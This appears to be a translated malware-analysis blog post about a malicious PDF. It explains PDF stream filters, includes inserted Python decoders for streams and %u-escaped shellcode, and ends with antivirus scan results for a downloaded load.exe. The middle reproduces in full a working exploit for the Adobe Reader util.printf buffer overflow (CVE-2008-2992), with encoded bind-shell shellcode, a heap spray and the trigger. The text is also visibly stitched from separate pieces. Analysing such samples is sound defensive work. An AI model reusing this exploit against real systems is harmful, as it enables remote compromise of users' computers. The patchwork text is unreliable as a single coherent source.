Anyway, I'll have to work through them one at a time.
Opening up the file, it looks roughly like this.
For the details of PDF stream objects I'll just point to the link below; refer to it if you need to.
http://blog.didierstevens.com/2008/05/19/pdf-stream-objects/
A PDF stream object is a sequence of bytes. There is a virtually unlimited number of ways to represent the same byte sequence. After Names and Strings obfuscation, let’s take a look at streams.
A PDF stream object is composed of a dictionary (<< >>), the keyword stream, a sequence of bytes and the keyword endstream. All streams must be indirect objects. Here is an example:
This stream is indirect object 5 version 0. The stream dictionary must have a /Length entry, to document the length of the (encoded) byte sequence. The stream and endstream keywords are terminated with the EOL character(s). In this example, the byte sequence is a set of instructions for the PDF reader to render the string Hello World with a given font at a precise position. It’s precisely 42 bytes long.
In this example, the byte sequence is represented literally, but it’s possible (and usual) to encode the byte sequence. This is done with a stream filter. A stream filter specifies how the sequence of bytes has to be decoded. Let’s take the same example, but with an ASCII85 encoding:
The /Filter entry instructs the PDF reader how to decode the byte sequence (/ASCII85Decode). Notice the change of the length value. There are many encoding schemes (ASCII filters and decompression filters), here is a list:
- ASCIIHexDecode
- ASCII85Decode
- LZWDecode
- FlateDecode
- RunLengthDecode
- CCITTFaxDecode
- JBIG2Decode
- DCTDecode
- JPXDecode
- Crypt
This list is not so long, so why do I claim an almost limitless number of ways to encode a stream? I have 2 reasons:
- Many filters, like /FlateDecode, take parameters (in this case, the compression level), which influence the encoding too
- Filters can be cascaded, meaning that the stream has to be decoded by more than one filter
Here is our example, where the stream is encoded twice, first with ASCII85 and then with plain HEX (I know, this is rather pointless, but it yields simple and readable examples):
Cascading filters also inspired me to create a couple of test PDF documents. For example, I've created a small PDF document of 2642 bytes that contains a 1GB stream (a ZIP bomb of sorts). Some PDF readers will choke on this document.
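To make the filter-cascade point concrete, here is an added example (my own code, not from the original post and not Didier Stevens' pdf-parser). It pulls every stream object out of a PDF, reads the /Filter entry, applies the filters in the order the array lists them, and checks the declared /Length against where the endstream keyword actually sits. The input is a constructed PDF fragment, not a real file: object numbers 5 to 8, the "Hello World" content string and the deliberately wrong /Length on object 8 are all made up for the example.

```python
"""Extract and decode PDF stream objects, including cascaded /Filter arrays (added example)."""
import base64
import binascii
import re
import zlib

# "N G obj <<dict>> stream\n": capture the object number and the dictionary text before the data.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bstream\r?\n", re.DOTALL)
# /Filter is either one name or an array of names; the array is in DECODE order.
FILTER_RE = re.compile(rb"/Filter\s*(?:\[([^\]]*)\]|(/\w+))")
# Direct /Length only; an indirect reference such as '/Length 6 0 R' is skipped here.
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?![\d\s]*\bR\b)")


def apply_filter(name, data):
    """Decode one standard filter. Image codecs (DCT, JPX, CCITT, JBIG2) are left out on purpose."""
    if name == b"/FlateDecode":
        return zlib.decompress(data)
    if name == b"/ASCIIHexDecode":
        body = re.sub(rb"\s+", b"", data.split(b">", 1)[0])  # '>' is the EOD marker
        if len(body) % 2:
            body += b"0"  # spec: a dangling final hex digit is treated as if followed by 0
        return binascii.unhexlify(body)
    if name == b"/ASCII85Decode":
        body = data[2:] if data.startswith(b"<~") else data
        end = body.find(b"~>")  # '~>' is the EOD marker
        if end != -1:
            body = body[:end]
        return base64.a85decode(re.sub(rb"\s+", b"", body))
    raise ValueError("unsupported filter %r" % name)


def extract_streams(pdf):
    """Return one record per stream object: filters, declared vs. actual length, decoded bytes."""
    records = []
    for m in OBJ_RE.finditer(pdf):
        num, dictionary, start = int(m.group(1)), m.group(3), m.end()
        lm = LENGTH_RE.search(dictionary)
        declared = int(lm.group(1)) if lm else None
        # Trust /Length only if 'endstream' really follows the declared number of bytes.
        tail = pdf[start + declared:start + declared + 12] if declared is not None else b""
        if tail.lstrip(b"\r\n").startswith(b"endstream"):
            raw, mismatch = pdf[start:start + declared], False
        else:
            end = pdf.find(b"endstream", start)
            if end == -1:
                continue
            raw = pdf[start:end]
            if raw.endswith(b"\r\n"):
                raw = raw[:-2]
            elif raw[-1:] in (b"\n", b"\r"):
                raw = raw[:-1]
            mismatch = declared is not None  # a lying /Length is a classic evasion trick
        fm = FILTER_RE.search(dictionary)
        if fm is None:
            filters = []
        elif fm.group(1) is not None:
            filters = re.findall(rb"/\w+", fm.group(1))
        else:
            filters = [fm.group(2)]
        decoded = raw
        try:
            for f in filters:
                decoded = apply_filter(f, decoded)
        except (ValueError, zlib.error, binascii.Error):
            decoded = None  # broken or unsupported stream: record it and move on
        records.append({"obj": num, "filters": filters, "declared": declared,
                        "actual": len(raw), "length_mismatch": mismatch, "decoded": decoded})
    return records


CONTENT = b"BT /F1 24 Tf 100 700 Td (Hello World) Tj ET"  # constructed 'Hello World' page content


def build_sample_pdf():
    """Constructed PDF fragment (not a real file): the same content four ways, one with a bogus /Length."""
    def obj(num, extra, data, declared=None):
        length = len(data) if declared is None else declared
        return (b"%d 0 obj\n<< /Length %d %s>>\nstream\n" % (num, length, extra)
                + data + b"\nendstream\nendobj\n")

    a85 = base64.a85encode(CONTENT) + b"~>"
    # Encoded with ASCII85 first and then hex, so the /Filter array names hex decoding first.
    hex_of_a85 = binascii.hexlify(a85) + b">"
    return (obj(5, b"", CONTENT)
            + obj(6, b"/Filter /ASCII85Decode ", a85)
            + obj(7, b"/Filter [/ASCIIHexDecode /ASCII85Decode] ", hex_of_a85)
            + obj(8, b"/Filter /FlateDecode ", zlib.compress(CONTENT), declared=9999))


if __name__ == "__main__":
    for r in extract_streams(build_sample_pdf()):
        print(r["obj"], r["filters"], r["declared"], r["actual"], r["length_mismatch"], r["decoded"])
```

The same loop handles any cascade length, which is the point of the /Filter array: the reader simply runs the filters one after another. Two checks matter when the file is hostile. First, never take /Length at face value; a stream whose declared length does not land on the endstream keyword is suspicious in itself, and the reader will still find the data by the keyword. Second, /DecodeParms (for example PNG predictors on FlateDecode) is not handled here, so a stream that decompresses to garbage may simply need its predictor undone.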
Getting this script to actually execute inside a running PDF looked like it would take far too long, so I'll pass on that~
What matters is finding the address the file is downloaded from, so let's focus on that lol
Decoding the contents above gives the UCS-2 (%uXXXX-escaped) string below.
The part in the red box is the script that actually runs; the part in the blue box is the code that triggers the overflow through util.printf.
For the exploit code for the printf overflow, see the following link...
http://www.milw0rm.com/exploits/7006
Adobe Reader Javascript Printf Buffer Overflow Exploit
===========================================================
Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
CVE-2008-2992
Thanks to coresecurity for the technical background.
6Nov,2008: Exploit released by me
Credits: Debasis Mohanty
www.hackingspirits.com
www.coffeeandsecurity.com
===========================================================
//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
//www.coffeeandsecurity
//www.hackingspirits.com
// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
var payload = unescape(
"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949" +
"%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850" +
"%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164" +
"%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550" +
"%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877" +
"%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474" +
"%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c" +
"%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c" +
"%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346" +
"%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b" +
"%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230" +
"%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633" +
"%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50" +
"%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947" +
"%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164" +
"%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130" +
"%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337" +
"%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d" +
"%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b" +
"%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679" +
"%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174" +
"%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350"
);
//Heap Spray starts here - Kiddos don't mess up with this
var nop ="";
for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + payload;
bigblock = unescape("%u9090%u9090");
headersize = 20;
spray = headersize+heapblock.length
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;
// reference snippet from core security
// http://www.coresecurity.com/content/adobe-reader-buffer-overflow
var num = 1299999999999999999988888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",num);
# milw0rm.com [2008-11-05]
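The UCS-2 to hex step that the rest of this analysis relies on, as an added example (my own code, not the author's tool and not part of the exploit above). It mimics JavaScript's unescape() to get the UTF-16 code units, lays them out little-endian as they sit on the heap after the spray, and then runs a printable-string and URL search over the bytes. The only payload bytes taken from the page are the first five code units of the reference exploit (its GetPC stub); the sample URL http://example.invalid/load.exe is constructed for the example and uses the reserved .invalid TLD, so it never resolves.

```python
"""Decode JavaScript %u-escaped (UCS-2) payloads to bytes and hunt for embedded URLs (added example)."""
import re
import struct

# Mirrors JavaScript unescape(): %uXXXX -> one UTF-16 code unit, %XX -> one code unit, else literal.
ESC_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|(.)", re.DOTALL)


def js_unescape(s):
    """Return the UTF-16 code units that unescape(s) would produce in the JS engine."""
    units = []
    for m in ESC_RE.finditer(s):
        if m.group(1) is not None:
            units.append(int(m.group(1), 16))
        elif m.group(2) is not None:
            units.append(int(m.group(2), 16))
        else:
            ch = m.group(3).encode("utf-16-le")  # astral chars become a surrogate pair, as in JS
            units.extend(struct.unpack("<%dH" % (len(ch) // 2), ch))
    return units


def units_to_bytes(units):
    """Lay the JS string out as it sits in memory after the heap spray: UTF-16LE, low byte first.
    This byte order is why '%u03eb%ueb59' becomes EB 03 59 EB on the heap."""
    return b"".join(struct.pack("<H", u) for u in units)


def ucs2_to_hex(s):
    """The conversion the analysis describes: %u-escaped string in, hex of the raw bytes out."""
    return units_to_bytes(js_unescape(s)).hex()


URL_RE = re.compile(rb"(?:https?|ftp)://[\x21-\x7e]+")
STRING_RE = re.compile(rb"[\x20-\x7e]{6,}")


def find_urls(data):
    """Printable-string search for download URLs; only works on unencoded shellcode (see note)."""
    return [u.decode("ascii") for u in URL_RE.findall(data)]


def find_strings(data):
    return [s.decode("ascii") for s in STRING_RE.findall(data)]


def to_u_escape(data):
    """Inverse direction: turn raw bytes into the %uXXXX form an exploit author would paste."""
    if len(data) % 2:
        data += b"\x00"
    return "".join("%%u%02x%02x" % (data[i + 1], data[i]) for i in range(0, len(data), 2))


# The first five code units of the reference exploit's payload (taken from the page): a GetPC stub
# (jmp +3; pop ecx; jmp +5; call -8) that the Alpha2 decoder uses to find itself in memory.
GETPC_STUB = "%u03eb%ueb59%ue805%ufff8%uffff"

# Constructed sample, not from a real file: a short NOP sled, the stub above, and a plain-text
# download URL on the reserved .invalid TLD (assumed for the example; it can never resolve).
SAMPLE_URL = b"http://example.invalid/load.exe"
SAMPLE = "%u9090%u9090" + GETPC_STUB + to_u_escape(SAMPLE_URL + b"\x00")


def analyse(escaped):
    """Decode a %u string and report size, hex, and any URLs or printable strings in it."""
    data = units_to_bytes(js_unescape(escaped))
    return {"size": len(data), "hex": data.hex(),
            "urls": find_urls(data), "strings": find_strings(data)}


if __name__ == "__main__":
    r = analyse(SAMPLE)
    print(r["size"], "bytes")
    print(r["hex"])
    print("URLs:", r["urls"])
```

One caveat before trusting the string search: the reference payload quoted above is Alpha2-encoded (Encoder=Alpha2 in its header comment), so running these functions over its 696 bytes shows only the GetPC stub followed by a long alphanumeric run, not a URL. A download address hidden inside an encoded payload only appears after the decoder stub has run, so for such a sample you let it execute under a shellcode emulator or a debugger and search the decoded bytes instead. The string search works directly when, as in the sample analysed here, the URL is stored in the clear.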
Converting the UCS-2 string to hex values yields the address below.
(I'm not redacting the address, so anyone who downloads from it should be careful lol, I don't know what it is yet lol)
I confirmed that the following address downloads load.exe.
The file hasn't been analyzed yet, and not many antivirus engines detect it.
File load.exe received on 03.11.2009 02:04:12 (CET)
Antivirus | Version | Last Update | Result
a-squared | 4.0.0.101 | 2009.03.10 | - |
AhnLab-V3 | 5.0.0.2 | 2009.03.10 | - |
AntiVir | 7.9.0.107 | 2009.03.10 | - |
Authentium | 5.1.0.4 | 2009.03.10 | - |
Avast | 4.8.1335.0 | 2009.03.10 | - |
AVG | 8.0.0.237 | 2009.03.10 | - |
BitDefender | 7.2 | 2009.03.11 | - |
CAT-QuickHeal | 10.00 | 2009.03.10 | (Suspicious) - DNAScan |
ClamAV | 0.94.1 | 2009.03.11 | - |
Comodo | 1046 | 2009.03.10 | - |
DrWeb | 4.44.0.09170 | 2009.03.11 | - |
eSafe | 7.0.17.0 | 2009.03.09 | - |
eTrust-Vet | 31.6.6388 | 2009.03.09 | - |
F-Prot | 4.4.4.56 | 2009.03.10 | - |
F-Secure | 8.0.14470.0 | 2009.03.10 | - |
Fortinet | 3.117.0.0 | 2009.03.10 | - |
GData | 19 | 2009.03.11 | - |
Ikarus | T3.1.1.45.0 | 2009.03.10 | - |
K7AntiVirus | 7.10.665 | 2009.03.10 | - |
Kaspersky | 7.0.0.125 | 2009.03.11 | Trojan.Win32.Agent2.ezl |
McAfee | 5549 | 2009.03.10 | - |
McAfee+Artemis | 5549 | 2009.03.10 | - |
Microsoft | 1.4405 | 2009.03.10 | VirTool:Win32/Obfuscator.ES |
NOD32 | 3925 | 2009.03.11 | - |
Norman | 6.00.06 | 2009.03.10 | - |
nProtect | 2009.1.8.0 | 2009.03.10 | - |
Panda | 10.0.0.10 | 2009.03.10 | - |
PCTools | 4.4.2.0 | 2009.03.10 | - |
Prevx1 | V2 | 2009.03.11 | - |
Rising | 21.20.11.00 | 2009.03.10 | - |
SecureWeb-Gateway | 6.7.6 | 2009.03.10 | - |
Sophos | 4.39.0 | 2009.03.10 | - |
Sunbelt | 3.2.1858.2 | 2009.03.10 | - |
Symantec | 1.4.4.12 | 2009.03.11 | - |
TheHacker | 6.3.3.0.278 | 2009.03.11 | - |
TrendMicro | 8.700.0.1004 | 2009.03.10 | - |
VBA32 | 3.12.10.1 | 2009.03.11 | - |
ViRobot | 2009.3.10.1643 | 2009.03.10 | - |
VirusBuster | 4.5.11.0 | 2009.03.10 | - |
Additional information
File size: 29184 bytes
MD5: a647e2ad9a87554c634c2174d388eb3b